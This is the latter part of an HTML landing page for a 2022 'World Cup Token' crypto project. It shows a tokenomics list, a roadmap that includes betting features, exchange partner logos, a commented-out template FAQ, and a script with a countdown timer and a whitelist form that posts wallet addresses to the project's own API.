                                    🔹 2% Automatic Redistribution <br>
                                    🔹 2% Added to Liquidity <br>
                                    🔹 2% BuyBack + Burn <br>
                                    🔹 3% PoolWinner
                                </p>
                            </div>
                        </div>
                    </div>
                    
                </div>
            </div>
            <div class="col-lg-6 col-md-6">
            	<div class="count-down-date-tabs">
            		<div id="countdown">
            			<div class="coundown-title">
            				<h3>Token Airdrop Live</h3>
            			</div>
            		</div>
            		<div class="wrapper">
            		</div>
                    <div class="count-shape">
                        <i class="loiqcG icon-payment-binance-coin undefined"></i>
                        
                        <i class="loiqcG icon-payment-pancake-swap undefined"></i>
                    </div>
            	</div>
            </div>
		</div>
    </div>
</div>
<!--==================================================-->
<!-- End Cryptobit token Area -->
<!--==================================================-->

<!--==================================================-->
<!-- Start Cryptobit road map Area -->
<!--==================================================-->
<div class="road-map-area pt-100 pb-50" id="roadmap">
	<div class="container">
		<div class="row">
             <div class="col-lg-12 col-sm-12">
                 <div class="dreamit-section-title text-center up pb-5">
                    <h4>Timeline</h4>
                    <h1>Stratagy & <span>Roadmap</span></h1>
                </div>
            </div>
        </div>
		<div class="row pt-130">
            <div class="col-lg-3 col-md-6">
                <div class="single-road-map-box">
                    <div class="road-map-inner-box">
                        <div class="road-top-title">
                            <p>Phase 1</p>
                        </div>
                        <div class="road-map-content">
                            <div class="road-map-title">
                                <h4>Start project</h4>
                            </div>
                            <div class="road-map-text">
                                <span>- Design Website & Dashboard</span> <br>
                                <span>- Smart Contract Token</span><br>
                                <span>- Public Security Audit </span><br>
                                <span>- Token Presale & Mint NFTs</span><br>
                                <span>- Big marketing and Social media push </span> <br>
             
                            </div>
                        </div>               
                    </div>
                </div>
            </div>
            <div class="col-lg-3 col-md-6">
                <div class="single-road-map-box upper1">
                    <div class="road-map-inner-box">
                        <div class="road-top-title">
                            <p>Phase 2</p>
                        </div>
                        <div class="road-map-content">
                            <div class="road-map-title">
                                <h4>Development</h4>
                            </div>
                            <div class="road-map-text">
                                <span>- Listing Exchange (PancakeSwap, CMC, CoinGecko, MEXC)</span> <br>
                                <span>- Dapp system </span> <br>
                                <span>- NFT Platform </span> <br>
                                <span>- Prepare for World Cup 2022 </span> <br>
                                <span>- Token Staking, Farming</span> <br>
                            </div>
                        </div>               
                    </div>
                </div>
            </div>
            <div class="col-lg-3 col-md-6">
                <div class="single-road-map-box upper2">
                    <div class="road-map-inner-box">
                        <div class="road-top-title">
                            <p>Phase 3</p>
                        </div>
                        <div class="road-map-content">
                            <div class="road-map-title">
                                <h4>Worldcup</h4>
                            </div>
                            <div class="road-map-text">
                                <span>- Handicap Betting WC2022</span><br>
                                <span>- Start Event in Games</span><br>
                                <span>- Get 30,000 holders</span><br>
                                <span>- Expanded representation in numerous nations</span><br>
                                <span>- Multi-chain building</span><br>
                                
                            </div>
                        </div>               
                    </div>
                </div>
            </div>
            <div class="col-lg-3 col-md-6">
                <div class="single-road-map-box upper3">
                    <div class="road-map-inner-box">
                        <div class="road-top-title">
                            <p>Phase 4</p>
                        </div>
                        <div class="road-map-content">
                            <div class="road-map-title">
                                <h4>Tournament</h4>
                            </div>
                            <div class="road-map-text">
                                <span>- Mobile App & Expanded Handicap Betting develop</span><br>
                                <span>- Update NFT for simulator game</span><br>
                                <span>- Football manager simulator begin develop</span><br>
                                <span>- And more Tournament</span><br>
                                <span>- Upgrade project... </span><br>
                            </div>
                        </div>               
                    </div>
                </div>
            </div>
		</div>
		<div class="road-shape">
			<div class="road-thumb">
				<img src="images/iDS5t1uiRi0J.png" alt>
			</div>
		</div>
	</div>
</div>
<!--==================================================-->
<!-- End Cryptobit road map Area -->
<!--==================================================-->

<!-- ===============//table section start here \\=============== -->

<!-- ===============//table section start here \\================ -->
<div class="table-section cripto-area pt-100 pb-100">
	<div class="container">
		<div class="row">
			<div class="col-lg-6 col-md-6 col-sm-12">
				<div class="dreamit-cripto-thumb">
					<div class="cripto-main-thumb">
						<img src="images/1PP3LPCSbsfD.png" alt>
					</div>
					<div class="cripto-thumb-inner bounce-animate4">
						<img src="images/jmRtasKOybsS.png" alt>
					</div>
				</div>
			</div>
			<div class="col-lg-6 col-md-6 col-sm-12">
	             <div class="dreamit-section-title">
	                <h4>PARTNERS</h4>
	            </div>
	            <div class="mt-5">
                    <div class="row">
                        <a href="https://www.binance.com/" target="_blank" class="col-6">
                            <img src="images/VpwhhL3kC8HG.png" alt class="p-1 img-fluid">
                        </a>
                        <a href="https://coinmarketcap.com/" target="_blank" class="col-6">
                            <img src="images/EjYWB3T1CqUM.png" alt class="p-1 img-fluid">
                        </a>
                    </div>
                    <div class="row">
                        <a href="https://www.coingecko.com/" target="_blank" class="col-6">
                            <img src="images/1gBYOexTysqg.png" alt class="p-1 img-fluid">
                        </a>
                                            

                        <a href="https://pancakeswap.finance/" target="_blank" class="col-6">
                            <img src="images/jRrpVEgvFEzS.png" alt class="p-1 img-fluid">
                        </a>
                        <a href="https://www.mexc.com/" target="_blank" class="col-6">
                            <img src="images/KeYTJH3A8icO.png" alt class="p-1 img-fluid">
                        </a>
                    </div>
                </div>
			</div>
		</div>
	</div>
</div>
<!-- ===============//table section end here \\================== -->

<!-- ===============//faq section start here \\================= -->
<!-- <div class="faq-area pt-100 pb-70">
    <div class="container">
        <div class="row">
            <div class="col-lg-12">
                <div class="dreamit-section-title up text-center pb-35">
                    <h4>FAQ</h4>
                    <h1>Question & <span>Answer</span></h1>
                    <p class="section-text">Cryptocurrencies are used primarily outside existing banking governmental institutions and exchanged</p>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-lg-6 col-md-6">
                <div class="tab-content text-center">
                    <ul class="tabs">
                        <li class="active" rel="tab1"> <i class="fas fa-play"></i>General Question</li>  
                        <li rel="tab3"><i class="fas fa-play"></i> About ICO</li>
                        <li rel="tab4"><i class="fas fa-play"></i> Token Sales</li>
                        <li rel="tab5"><i class="fas fa-play"></i> Client Related</li>
                        <li rel="tab6"><i class="fas fa-play"></i> Pre-ICO</li>
                        <li rel="tab7"><i class="fas fa-play"></i> Legal Info</li>
                        <li rel="tab2"><i class="fas fa-play"></i> Pre sales</li>
                        <li class="border-none" rel="tab8"><i class="fas fa-play"></i> Token Sales</li>
                    </ul>
                </div>
            </div>
            <div class="col-lg-6 col-md-6">
                <div class="tab_container">
                    <h3 class="d_active tab_drawer_heading" rel="tab1">Tab 1</h3>
                    <div id="tab1" class="tab_content">
                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                    
                    <h3 class="tab_drawer_heading" rel="tab2"> Token  </h3>
                    <div id="tab2" class="tab_content">
                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                    
                    <h3 class="tab_drawer_heading" rel="tab3">  Client </h3>
                    <div id="tab3" class="tab_content">

                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                    
                    <h3 class="tab_drawer_heading" rel="tab4"> Pre ICO</h3>
                    <div id="tab4" class="tab_content">

                        <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                    
                    <h3 class="tab_drawer_heading" rel="tab5"> Legal</h3>
                    <div id="tab5" class="tab_content">
                        <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                    
                    <h3 class="tab_drawer_heading" rel="tab6"> Legal</h3>
                    <div id="tab6" class="tab_content">
                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>

                    
                    <h3 class="tab_drawer_heading" rel="tab7"> Legal</h3>
                    <div id="tab7" class="tab_content">
                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>

                    
                    <h3 class="tab_drawer_heading" rel="tab8"> Legal</h3>
                    <div id="tab8" class="tab_content">
                         <ul class="accordion">
                        <li>
                            <a>Can I make payments directly from an exchange?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>When will CICO be listed on exchanges?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>What is the ICO Token asmart contract address?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                        <li>
                            <a>How can I create a crypto-wallet?</a>
                            <p>Collaboratively syndicate turnkey methodologies after cutting-edge potentialities. Energistically enable standards compliant e-markets without viral initiatives. Globally pontificate intermandated initiatives with</p>
                        </li>
                    </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div> -->
<!-- ===============//faq section end here \\=================== -->

<!--==================================================-->
<!-- Start Cryptobit popular section Area -->
<!--==================================================-->


<!--==================================================-->
<!-- End Cryptobit popular section Area -->
<!--==================================================-->

<!--==================================================-->
<!-- Start Cryptobit Footer Middle Area -->
<!--==================================================-->
<div class="footer-middle pt-80 pb-3"> 
	<div class="container">
		<div class="row">
			<div class="col-lg-4 col-md-6 col-sm-12">
				<div class="widgets-company-info  pt-3">
					<div class="cryptobit-logo">
						<a class="logo_img" href="index.html" title="cryptobit">
							<img src="images/logo1.png" alt width="200">
						</a>
					</div>
					<div class="company-info-desc">
						<p>World Cup Token on smartphone app will complete on phase 4.</p>
					</div>
					<div class="company_icon">
                        <a class="facebook" title="Telegram Group" href="https://telegram.org/"><i class="fab fa-telegram"></i></a>
                        <a class="twitter" title="Twitter" href="https://twitter.com/"><i class="fab fa-twitter"></i></a>
                        <a class="linkedin" title href="#"><i class="fab fa-youtube"></i></a>
                        <a class="pinterest" href="#"><i class="fab fa-github"></i></a>
                    </div>
                </div>					
            </div>

            <div class="col-lg-8">
                <div class="row">
                    <div class="col-lg-6 col-md-6 col-sm-12">
                        <div class="widget-nav-menu text-center">
                            <h4 class="widget-title">Links</h4>
                            <div class="menu-quick-link-content">
                                <ul class="menu">
                                    <li><a href="#">What is WCT</a></li>
                                    <li><a href="#">Tokenomics</a></li>
                                    <li><a href="#">Road Map</a></li>
                                    <li><a href="#">Presales</a></li>
                                    <li><a href="#">Q&A</a></li>
                                </ul>
                            </div>
                        </div>
                    </div>  
                    
                    <div class="col-lg-6 col-md-6 col-sm-12">
                        <div class="widget-nav-menu upper1">
                            <h4 class="widget-title"></h4>
                            <div class="menu-quick-link">
                                <p></p>
                            </div>
                            <div class="contact-form-box-2 text-center">
                                <span class="text-danger"></span>
                            </div>
                        </div> 
                    </div>
                </div>
            </div>  
        </div>
		<div class="row footer-bottom mt-65">
			<div class="col-lg-4 col-md-6 col-sm-12">
				<div class="footer-bottom-content">
					<div class="footer-bottom-content-copy">
						<p>© 2022 <span>World Cup Token</span></p>
					</div>
				</div>
			</div>
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="footer-bottom-content">
                    <div class="footer-bottom-menu">
                        <ul>
                            <li>Privacy Policy</li>
                            <li>Terms & Condition</li>
                        </ul>
                    </div>
                </div>
            </div>
            <div class="col-lg-4 col-md-6 col-sm-12">
                <div class="footer-bottom-shape">
                    <i class="loiqcG icon-payment-binance-coin undefined"></i>
                    
                    <i class="loiqcG icon-payment-pancake-swap undefined"></i>
                </div>
            </div>
		</div>
    </div>
</div>	
</div>	
</div>  
<!--==================================================-->
<!-- End Cryptobit Footer Middle Area -->
<!--==================================================-->

<!--==================================================-->
<!-- Start scroll Area -->
<!--==================================================-->
<div class="scroll-area">
    <div class="top-wrap">
        <div class="go-top-btn-wraper">
            <div class="go-top go-top-button">
                <i class="fas fa-arrow-up"></i>
                <i class="fas fa-arrow-up"></i>
            </div>
        </div>
    </div>
</div>
<!--==================================================-->
<!-- Start scroll Area -->
<!--==================================================-->
	

<!-- loder -->
    <div class="loader-wrapper">
      <div class="loader"></div>
      <div class="loder-section left-section"></div>
      <div class="loder-section right-section"></div>
    </div>

    
	<!-- jquery js -->	
	<script src="js/WKOWUSPHotYm.js" crossorigin="anonymous"></script>
	<!-- bootstrap js -->	
	<script src="js/gxRnfNk9OvFW.js"></script>
	<script src="js/bXP1QgCR5Yqs.js"></script>
	<!-- carousel js -->
	<script src="js/glHKnpztlKdf.js"></script>
	<!-- waypoints js -->
	<script src="js/ceukkqtLhOKH.js"></script>
	<!-- wow js -->
	<script src="js/GC9etES0S5iI.js"></script>
	<!-- imagesloaded js -->
	<script src="js/HebXTObIa9Na.js"></script>
	<!-- venobox js -->
	<script src="js/Rrt7RAbLCmcd.js"></script>
	<!--  animated-text js -->	
	<script src="js/tFRDSuzfnHXF.js"></script>
	<!-- venobox min js -->
	<script src="js/hbxYoDw3tH26.js"></script>
	<!-- jquery meanmenu js -->	
	<script src="js/PQqw6booi4Nc.js"></script>
	<!-- jquery scrollup js -->
	<script src="js/8wRclik6O1gV.js"></script>
	<!-- theme js -->	
	<script src="js/TwYl8LT0uMLm.js"></script>
	<!-- barfiller js -->
	<script src="js/3u6uByN3lm6P.js"></script>
    <script>
        var target_date = new Date("2022-10-30 15:00:00Z").getTime(); // set the countdown date
        var days, hours, minutes, seconds; // variables for time units

        var countdown = document.getElementById("tiles"); // get tag element

        getCountdown();

        setInterval(function () { getCountdown(); }, 1000);

        function getCountdown() {

            // find the amount of "seconds" between now and target
            var current_date = new Date().getTime();
            var seconds_left = (target_date - current_date) / 1000;

            days = pad(parseInt(seconds_left / 86400));
            seconds_left = seconds_left % 86400;

            hours = pad(parseInt(seconds_left / 3600));
            seconds_left = seconds_left % 3600;

            minutes = pad(parseInt(seconds_left / 60));
            seconds = pad(parseInt(seconds_left % 60));

            // format countdown string + set tag value
            countdown.innerHTML = "<span>" + days + "</span><span>" + hours + "</span><span>" + minutes + "</span><span>" + seconds + "</span>";
        }

        function pad(n) {
            return (n < 10 ? '0' : '') + n;
        }

        $("#subscribe-form").submit(async function (e) {
            var addr = $(this).find("[type='text']").val();
            if (!addr.match(/(\b0x[a-fA-F0-9]{40}\b)/g)) {
                $(this).find("[type='text']").css("border-color", "#ff0000");
                $(this).next().text("Your text is not correct address format!");
                e.preventDefault();
                return false;
            }
            $.ajax({
                url: `https://counter.worldcup.finance/api?handler=subd&addr=${addr}`,
                type: "get",processData: false,contentType: false,success: function (data) {console.log(data);
                    if (data.res) {
                        $("#subscribe-form").next().text("");
                        alert("Your address already whitelisted!");
                        e.preventDefault();
                        return false;
                    }
                    $.ajax({
                        url: `https://counter.worldcup.finance/api?handler=sub&addr=${addr}&email=hi@worldcup.finance`,
                        type: "get",
                        processData: false,
                        contentType: false,
                        success: function (data) {
                            $("#subscribe-form").next().text("");
                            alert("Thank for subcrible!");
                        },
                        cache: false
                    });
                },
                cache: false
            });
            e.preventDefault();
            return false;
        });

        const params = new URLSearchParams(window.location.search);
        if (params.has("ref")) {
            console.log(params.get("ref"));
            Cookies.set('WCFer-referral', params.get("ref"));
        }

    </script>

</body></html>